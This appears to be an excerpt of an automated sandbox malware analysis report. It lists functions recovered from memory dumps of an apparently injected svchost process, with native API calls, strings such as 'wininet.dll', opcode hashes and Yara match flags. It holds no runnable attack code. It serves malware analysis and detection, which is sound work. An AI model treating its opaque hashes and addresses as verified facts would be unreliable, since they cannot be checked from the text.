                                                            Function 02A2A35D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,02A24BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A24BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02A2A3AD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID: .z`
                                                            • API String ID: 823142352-1441809116
                                                            • Opcode ID: cf90c0dcc383e5ff646b29dff74166267b426d9c3eb82d07523785710dce351f
                                                            • Instruction ID: 363fb4adc17d010ad4f396d664a0812379a30bc31921551958f778e94e32b58d
                                                            • Opcode Fuzzy Hash: cf90c0dcc383e5ff646b29dff74166267b426d9c3eb82d07523785710dce351f
                                                            • Instruction Fuzzy Hash: 31F0C4B2241108AFCB18CF88DD95EEB37ADEF8C714F118249BA0DA7251C634E9118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(02A24D72,5EB65239,FFFFFFFF,02A24A31,?,?,02A24D72,?,02A24A31,FFFFFFFF,5EB65239,02A24D72,?,00000000), ref: 02A2A455
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                            • Instruction ID: 72aeb6ad88b5032dc3563129a30a84aff8e270c68b3b5e805dfb0ab92e3cebe4
                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                            • Instruction Fuzzy Hash: FFF0A4B2200208ABCB14DF89DC80EEB77ADEF8C754F158249BA1D97241DA30E8118BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02A12D11,00002000,00003000,00000004), ref: 02A2A579
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                            • Instruction ID: 594fb081ef88249577008e42071efcfbf8833ef51c0775c628953fa0016a82e9
                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                            • Instruction Fuzzy Hash: B3F015B2200218ABCB14DF89CC80EAB77ADEF88754F118149BE1897241C630F810CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A48A Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(02A24D50,?,?,02A24D50,00000000,FFFFFFFF), ref: 02A2A4B5
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 04211d16ca2ecd1aecae30b08cc8488f01b9afb8dfe97b3ccc3c3b43d79c77ce
                                                            • Instruction ID: e8f51ec2137a76c5c99c30209bc96e75473bf1d9d6dfc664b9b84827425ce73e
                                                            • Opcode Fuzzy Hash: 04211d16ca2ecd1aecae30b08cc8488f01b9afb8dfe97b3ccc3c3b43d79c77ce
                                                            • Instruction Fuzzy Hash: 1BE0C276240214BFDB20DFACDC85EEB7B28EF44760F114159FA5D9B242C670E500CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A2A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(02A24D50,?,?,02A24D50,00000000,FFFFFFFF), ref: 02A2A4B5
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                            • Instruction ID: d5cd5a4e8bbfcca17278db8de09da0d3bdad40d621b21f502d6ee6fc39fd964a
                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                            • Instruction Fuzzy Hash: D7D012762402146BD710EB98CC45E97775DEF44B50F154459BA1C5B242C530F50086E0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d37f5fcde24b81aed3ba50d43eb3e5f3355ad9e77db425c33692e13e093e89d2
                                                            • Instruction ID: 172775af16b99e7ae9a5bcf661c307581710b4b8b4972c2a31d18d08c4e3d8bb
                                                            • Opcode Fuzzy Hash: d37f5fcde24b81aed3ba50d43eb3e5f3355ad9e77db425c33692e13e093e89d2
                                                            • Instruction Fuzzy Hash: 1290026165104C06E140B16984147470006DBD1641F51C012A0015954D8756896576F5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 31271d6d8a55b1c6b7c6ca4eaf2c9e0a26fc74350fa5f7b160844e81ff9154a4
                                                            • Instruction ID: 8d645ecf9c3628258cb2ca7266458f965db980abad0d7dbc3e2009c5cf96648c
                                                            • Opcode Fuzzy Hash: 31271d6d8a55b1c6b7c6ca4eaf2c9e0a26fc74350fa5f7b160844e81ff9154a4
                                                            • Instruction Fuzzy Hash: AE90026162184446E200A5794C14B4700059BD1343F51C116A0145954CCB5588616565
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 729217c8818f1654dfdda5500bcc36c6cb588d05319f6a61d64e9c58bc2a0c71
                                                            • Instruction ID: 7b45f16a481a93e5e6a341fe67e2e9de269197f5fe190fdda38bac1ec1af938c
                                                            • Opcode Fuzzy Hash: 729217c8818f1654dfdda5500bcc36c6cb588d05319f6a61d64e9c58bc2a0c71
                                                            • Instruction Fuzzy Hash: CF9002B161104806E140B169440478600059BD1341F51C012A5055954E87998DD576A9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 034699A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 943705b4e9d39ff60332ceb201590fedcd745ec0c15c26c072ffb26c607747f7
                                                            • Instruction ID: bea58112dade2d44eb84ec18d6bf339eaadd1158e0629dd9c58b24ee51a1f1ca
                                                            • Opcode Fuzzy Hash: 943705b4e9d39ff60332ceb201590fedcd745ec0c15c26c072ffb26c607747f7
                                                            • Instruction Fuzzy Hash: C99002A175104846E100A1694414B460005DBE2341F51C016E1055954D8759CC52716A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 32815766699fc65d16551099cf8225c37082582fe1b9401d0c77260a7443dc66
                                                            • Instruction ID: 481231ef97b8bd6862f4f3bde2105b7cd1da3164f70d9fc1b01fb06b7535c782
                                                            • Opcode Fuzzy Hash: 32815766699fc65d16551099cf8225c37082582fe1b9401d0c77260a7443dc66
                                                            • Instruction Fuzzy Hash: 96900261652085566545F16944045474006ABE1281791C013A1405D50C87669856E665
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: eee66bf98d5e7f346a28c14f97dabf5d1f555fa493f51bfc3e9bf70bc80b8fdb
                                                            • Instruction ID: 721692241b1575d16b876efe69372349f47c98cba18c4ad950efe9127ba264bc
                                                            • Opcode Fuzzy Hash: eee66bf98d5e7f346a28c14f97dabf5d1f555fa493f51bfc3e9bf70bc80b8fdb
                                                            • Instruction Fuzzy Hash: C090027161104817E111A169450474700099BD1281F91C413A0415958D97968952B165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469770 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 9c4a94d769f2c86267b0f4012ff97f6c484f6e5e5a9f3dc0c6a8c1168c169327
                                                            • Instruction ID: e9229be721a6bcb33d4f251a601faf974940f729ac72da702d1dd197aa96dca3
                                                            • Opcode Fuzzy Hash: 9c4a94d769f2c86267b0f4012ff97f6c484f6e5e5a9f3dc0c6a8c1168c169327
                                                            • Instruction Fuzzy Hash: A390026161508846E100A5695408A4600059BD1245F51D012A1055995DC7758851B175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0a122c963a61919018644b4999afc533fd462f75f3d9242780d4e52afc15d894
                                                            • Instruction ID: 6c700813036fda15f0d2e4fafc4bb2343a6d095cdb285efbf5418c230b6f0fb0
                                                            • Opcode Fuzzy Hash: 0a122c963a61919018644b4999afc533fd462f75f3d9242780d4e52afc15d894
                                                            • Instruction Fuzzy Hash: 3890027161104806E100A5A9540868600059BE1341F51D012A5015955EC7A588917175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d8eced7ba91e6e89b4324036836b9a5029556e63cebd3aeca0cc3d3fbb149bb4
                                                            • Instruction ID: edf248748426d2ec0d7f5fc390d729b25af113572ab2956de6c7d4be0b7facf3
                                                            • Opcode Fuzzy Hash: d8eced7ba91e6e89b4324036836b9a5029556e63cebd3aeca0cc3d3fbb149bb4
                                                            • Instruction Fuzzy Hash: 7090027172118806E110A169840474600059BD2241F51C412A0815958D87D588917166
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 7d1d5d26a38ed3e4053779a80975f4bccf6e03ddec2d00a9a9e378b4f9cd8a1e
                                                            • Instruction ID: c3542da5ff0274f083d4747691c791448eba2317ac09cbaf04da808fb45f567a
                                                            • Opcode Fuzzy Hash: 7d1d5d26a38ed3e4053779a80975f4bccf6e03ddec2d00a9a9e378b4f9cd8a1e
                                                            • Instruction Fuzzy Hash: B790026962304406E180B169540864A00059BD2242F91D416A0006958CCB5588696365
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 52fd59a00790f581183b0ec7b02e9b63e48fea48adf57af506ab8a9a85ad086b
                                                            • Instruction ID: f099cbc4cb6e0569d9ee2a0d0d0ac859f123c6f85c2f06821e819d0db01813f7
                                                            • Opcode Fuzzy Hash: 52fd59a00790f581183b0ec7b02e9b63e48fea48adf57af506ab8a9a85ad086b
                                                            • Instruction Fuzzy Hash: 6890027161508C46E140B1694404A8600159BD1345F51C012A0055A94D97658D55B6A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4e2bdeaf160ba4e8a75bb8cbc01025680fc3cc67d5a339625c122431c3610cfe
                                                            • Instruction ID: 3ddb0b5fe6e8357961c3619329b470e45316d582d90af8c213139464a8021c1e
                                                            • Opcode Fuzzy Hash: 4e2bdeaf160ba4e8a75bb8cbc01025680fc3cc67d5a339625c122431c3610cfe
                                                            • Instruction Fuzzy Hash: C590027161104C06E180B169440468A00059BD2341F91C016A0016A54DCB558A5977E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c3032b546bfc34132fe1723ca17db26b3836d11d6c9e5e4831e1b41ccb325669
                                                            • Instruction ID: 54680591ee48bf1b00a56af1e92c021227c6c9744277e34c280fa00b454f615e
                                                            • Opcode Fuzzy Hash: c3032b546bfc34132fe1723ca17db26b3836d11d6c9e5e4831e1b41ccb325669
                                                            • Instruction Fuzzy Hash: 6A900271A1504C06E150B169441478600059BD1341F51C012A0015A54D87958A5576E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 034696D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a135f7ece845bbfd4a315457ddd9002bd229999205ae18278083d021beaa7978
                                                            • Instruction ID: c192c8b09b3091f385dec31a72fd70a07cdc3b9a9927f7f660a428cea9f11ec6
                                                            • Opcode Fuzzy Hash: a135f7ece845bbfd4a315457ddd9002bd229999205ae18278083d021beaa7978
                                                            • Instruction Fuzzy Hash: F690027161104C46E100A1694404B8600059BE1341F51C017A0115A54D8755C8517565
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 034696E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 422aa480db2f2d9ea9496271b43a378570feaf67a5ae0bb2f32bd8acabf3c5ea
                                                            • Instruction ID: d560fb11157220cce11041b08f81ceb93b34b34cc2aa5b4341b25110b8f37bee
                                                            • Opcode Fuzzy Hash: 422aa480db2f2d9ea9496271b43a378570feaf67a5ae0bb2f32bd8acabf3c5ea
                                                            • Instruction Fuzzy Hash: 869002716110CC06E110A169840478A00059BD1341F55C412A4415A58D87D588917165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4ee2dacce31ce40bfe94d50b8a5700d935f59d03ff6d1d170201f951d9357499
                                                            • Instruction ID: 5b28eb8de60928031096985bb38f5e10599815e238b8e87ab2d5f71583eea9f1
                                                            • Opcode Fuzzy Hash: 4ee2dacce31ce40bfe94d50b8a5700d935f59d03ff6d1d170201f951d9357499
                                                            • Instruction Fuzzy Hash: AD900265621044071105E569070454700469BD6391351C022F1006950CD76188616165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 03469560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 688b78ea1ec82516399805eac8c1de9c6db6c2dc8119e41e7bc3abb0c67171f6
                                                            • Instruction ID: d8edb79dd30ee97d01da31f33548844c5c63a5583db99d2129b9bc8bc14b7c88
                                                            • Opcode Fuzzy Hash: 688b78ea1ec82516399805eac8c1de9c6db6c2dc8119e41e7bc3abb0c67171f6
                                                            • Instruction Fuzzy Hash: 69900265631044061145E569060454B0445ABD7391391C016F1407990CC76188656365
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 034695D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874833482.0000000003400000.00000040.00000800.00020000.00000000.sdmp, Offset: 03400000, based on PE: true
                                                            • Associated: 0000001A.00000002.874960050.000000000351B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 0000001A.00000002.874979162.000000000351F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_3400000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: e14536db0a048d019b1c9dc0630e991a365a469e612ed9124fa767fa4ec3f196
                                                            • Instruction ID: 5df116ea07b011e3a5d2285cb9e8974d0b5c85eff49e3716b1ca15a1878ac7e5
                                                            • Opcode Fuzzy Hash: e14536db0a048d019b1c9dc0630e991a365a469e612ed9124fa767fa4ec3f196
                                                            • Instruction Fuzzy Hash: D09002A1612044075105B1694414656400A9BE1241B51C022E1005990DC76588917169
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02A29080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 02A29128
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_26_2_2a10000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: net.dll$wininet.dll
                                                            • API String ID: 3472027048-1269752229
                                                            • Opcode ID: a1b7492857a8a25a3984b9832b8bf1e51afe202f6f4feea2de0658650f7e27fc
                                                            • Instruction ID: 690e0777c8c384cf9d48799955e724f214dc00b68055a5f8dfe2a022df1f6472
                                                            • Opcode Fuzzy Hash: a1b7492857a8a25a3984b9832b8bf1e51afe202f6f4feea2de0658650f7e27fc
                                                            • Instruction Fuzzy Hash: 7E31A1B2900351ABC714DF69C884FA7B7B9FB48B00F10841DF62A6B244DB34B554CFA4
